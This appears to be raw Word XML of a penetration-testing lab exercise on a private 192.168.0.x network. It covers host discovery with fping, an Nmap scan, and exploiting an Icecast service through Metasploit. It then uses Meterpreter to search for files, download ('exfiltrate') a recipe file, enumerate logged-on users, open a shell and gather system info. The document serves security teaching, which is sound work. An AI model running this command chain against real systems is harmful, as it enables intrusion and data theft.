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7EB2" w14:textId="62B8717B" w:rsidR="00BE57E6" w:rsidRPr="00BE57E6" w:rsidRDefault="00BE57E6" w:rsidP="00BE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7E6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145839D9" w14:textId="7DFCAD10" w:rsid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You've been provided full access to the network and are getting ping responses from the CEO’s workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD5256" w14:textId="0D94B359" w:rsidR="005073CE" w:rsidRDefault="005073CE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Pre-work commands used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB11C6D" w14:textId="76871985" w:rsidR="005073CE" w:rsidRPr="00211A78" w:rsidRDefault="005073CE" w:rsidP="005073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fping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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-g 192.168.0.0/24 | grep “alive” | awk ‘{print $1}’ &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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alives</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37EB0791" w14:textId="101B247D" w:rsidR="005073CE" w:rsidRPr="00211A78" w:rsidRDefault="005073CE" w:rsidP="005073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cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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alives</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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17B002BD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Perform a service and version scan using Nmap to determine which services are up and running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665DC62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Run the Nmap command that performs a service and version scan against the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC47FA2" w14:textId="6385FA4E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DB7491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nmap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iL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alives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sS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oN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nmap_ports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39613023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From the previous step, we see that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service is running. Let's start by attacking that service. Search for any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exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608070BA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SearchSploit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commands to show available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exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A716A62" w14:textId="3BC55AA2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searchsploit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icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C0B1123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Now that we know which exploits are available to us, let's start Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D35E5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Run the command that starts Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D29654A" w14:textId="48C2ED22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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="081F8C39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Search for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module and load it for use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D530CFF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to search for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14:paraId="36266582" w14:textId="5F6335A9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search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A110204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to use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14:paraId="798752D4" w14:textId="77777777" w:rsidR="00BE57E6" w:rsidRPr="00BE57E6" w:rsidRDefault="00BE57E6" w:rsidP="00BE57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Instead of copying the entire path to the module, you can use the number in front of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57818720" w14:textId="59E85878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use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29B70F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BE57E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RHOST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to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E608B86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that sets the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE57E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RHOST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D55BAF" w14:textId="42A3B28D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set RHOSTS 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B37C5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exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11074953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that runs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exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F94B6F0" w14:textId="63716100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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673B0175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that performs a search for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE57E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>secretfile.txt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on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB3D166" w14:textId="13F8C8F6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search -f *secret*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56752579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You should now have a Meterpreter session open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B709E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to performs a search for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE57E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>recipe.txt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on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088C3930" w14:textId="274F6F22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search -f *recipe*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067AAD79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: Run the command that exfiltrates the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE57E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>recipe*.txt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2B5DB5ED" w14:textId="7E0405F4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download c:\\Users\\IEUser\\Documents\\Drinks.recipe.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45191D10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You can also use Meterpreter's local exploit suggester to find possible exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CD217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The exploit suggester is just that: a suggestion. Keep in mind that the listed suggestions may not include all available exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2294B00C" w14:textId="77777777" w:rsidR="00BE57E6" w:rsidRPr="00BE57E6" w:rsidRDefault="00BE57E6" w:rsidP="00BE57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3D328138" w14:textId="05147D42" w:rsidR="00BE57E6" w:rsidRP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A. Run a Meterpreter </w:t>
      </w:r>
      <w:r w:rsidR="00925048" w:rsidRPr="00BE57E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>postscript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that enumerates all logged on users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55941869" w14:textId="6D2BFC0D" w:rsidR="00BE57E6" w:rsidRPr="00BE57E6" w:rsidRDefault="00BE57E6" w:rsidP="00BE5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run post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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enum_logged_on_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D795088" w14:textId="77777777" w:rsidR="00BE57E6" w:rsidRP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B. Open a Meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221349D3" w14:textId="77777777" w:rsidR="00BE57E6" w:rsidRPr="00BE57E6" w:rsidRDefault="00BE57E6" w:rsidP="00BE5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5903E404" w14:textId="77777777" w:rsidR="00BE57E6" w:rsidRP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C. Run the command that displays the target's computer system information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054F486C" w14:textId="609AB4E8" w:rsidR="00BE57E6" w:rsidRPr="00BE57E6" w:rsidRDefault="00BE57E6" w:rsidP="00BE5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sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="560B5B48" w14:textId="77777777" w:rsidR="00BE57E6" w:rsidRPr="00BE57E6" w:rsidRDefault="00BE57E6" w:rsidP="00BE57E6"/>
    <w:sectPr w:rsidR="00BE57E6" w:rsidRPr="00B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3850"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF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7211"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B29C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E6"/>
    <w:rsid w:val="00211A78"/>
    <w:rsid w:val="005073CE"/>
    <w:rsid w:val="00925048"/>
    <w:rsid w:val="00BE57E6"/>
    <w:rsid w:val="00D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902A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B67C2924-991F-46E6-BE25-132EF97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57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7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57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7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7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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-04T04:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-04T04:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>